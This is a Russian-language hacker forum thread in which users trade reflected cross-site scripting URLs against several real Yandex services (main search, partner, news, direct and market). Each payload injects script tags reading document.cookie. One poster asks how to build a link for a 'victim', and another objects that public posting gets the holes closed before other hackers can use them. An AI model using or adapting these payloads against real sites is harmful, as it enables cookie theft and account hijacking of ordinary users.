![]() |
Яндекс.Xss
Решил только что в свой чекер уязвимостей для прикола вписать yandex.ru. Вот что получилось :D
http://yandex.ru/?text="><script>alert(document.cookie)</script> |
огромная просьба, подскажите, как грамотно составить ссылку для жертвы, используя эту Хss , с меня +
|
Цитата:
|
быстро однако) часа 2 назад ещё работало)))
|
http://www.google.com/search?ie=UTF-8&hl=ru&q=%D1%8F%D0%BD%D0%B4%D0%B5%D0%BA%D1%81%20x ss
xss у меня тоже не пашет=\ (опера) |
увы, уже неактуально((
|
чтот быстро прикрыли
|
http://partner.yandex.ru/registered/?cmd=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript% 3E&act=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscrip t%3E
Вот вам ещё xss'ка =) |
не должен быть авторизирован
убери пробелы вчера работало |
В осле и мозилле пашет))
В опере жаваскрипт включен, но се равно не фурычит) |
http://te
st-lo l.narod.ru/1.JPG (моя опера) |
А чем вы на уязвимости чекаете?
|
inv
Какая версия? |
Цитата:
|
9.24
ты просто открой код страницы и найди alert('xss') и посмотри что там вокруг...==) |
NOmeR1, это стоило отдельной темы?
add NOmeR1, а ответить нормально слабо? |
Сори я пробка. Не разлогинился http://kolobok.us/smiles/standart/blush2.gif
|
FeraS=\
freddi здесь столько бестолковых тем...........тебя именно эта не устроила? для яндекса можно и создать |
люди, убедительная просьба. не выкладывайте в паблик такие уязвимости ИХ МОМЕНТАЛЬНО ИЗ-ЗА ВАС ЗАКРЫВАЮТ. подумайте, какой вред вы наносите другим хекерам , которые нашли их до вас...
убедительная просьба к модераторам НЕ УДАЛЯТЬ МОЙ ПОСТ |
а ты не подумал какой вред хекеры наносят?=)
Захотел выложил,это его право понятное дело,что обитая только в закрытых разделах,он бы выкладывал только там. |
PHP код:
|
И есчо XSS
news.yandex.ru Код:
http://news.yandex.ru/yandsearch?cl4url=&country="><script>alert(document.cookie)</script>direct.yandex.ru Код:
http://direct.yandex.ru/search?text=<h1><big>хек =\\</big></h1><script>alert(document.cookie)</script>market.yandex.ru Поиск: Код:
<SCRIPT> alert(document.cookie); </SCRIPT>Код:
http://market.yandex.ru/search.xml?cvredirect=1&text=<SCRIPT> alert(document.cookie); </SCRIPT> |
| Время: 22:32 |